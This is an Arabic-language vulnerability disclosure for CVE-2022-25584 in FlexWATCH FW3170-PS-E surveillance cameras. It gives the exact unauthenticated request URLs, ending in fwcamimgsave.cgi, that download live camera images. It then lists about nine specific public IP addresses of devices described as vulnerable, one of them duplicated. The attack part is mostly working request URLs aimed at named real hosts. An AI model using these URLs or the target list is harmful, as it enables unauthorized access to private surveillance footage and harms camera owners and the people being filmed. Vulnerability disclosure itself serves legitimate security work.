
Flexwatch-CVE
Flexwatch-CVE
هذه الوثيقة خاصة بـ CVE-2022-25584 "محجوز"
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25584

تم فهرسة هذه الثغرة الأمنية من قبل CNVD، ولكن لم يتم الإعلان عنها بعد
معرف CNVD: CNVD-2021-103443

إعادة إنتاج الثغرة الأمنية:
اكتشفنا أن نظام الشبكة المرئية FlexWATCH FW3170-PS-E 4.23-3000_GY المملوك لشركة Seyeon Tech Co., Ltd. يعاني من ثغرة وصول غير مصادق عليه، والتي يمكن استغلالها من قبل المهاجمين للحصول على صور المراقبة وتسريب معلومات حساسة
على سبيل المثال:
http://211.174.227.102:10001/app/multi/single.asp

بعد ذلك، يمكننا زيارة: http://211.174.227.102:10001/cgi-bin/fwcamimgsave.cgi?FwModId=0&PortId=0&FwCgiVer=0x0001
تنزيل الشاشة المباشرة للمراقبة


الموقع الرسمي للشركة: http://www.flexwatch.com/
حالات أخرى:
http://211.240.10.38:10001/app/multi/single.asp
http://121.133.21.35:10001/app/multi/single.asp
http://210.223.145.159:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://27.1.124.18:10001/app/multi/single.asp
http://183.100.61.196:10001/app/multi/single.asp
http://118.176.196.247:10001/app/multi/single.asp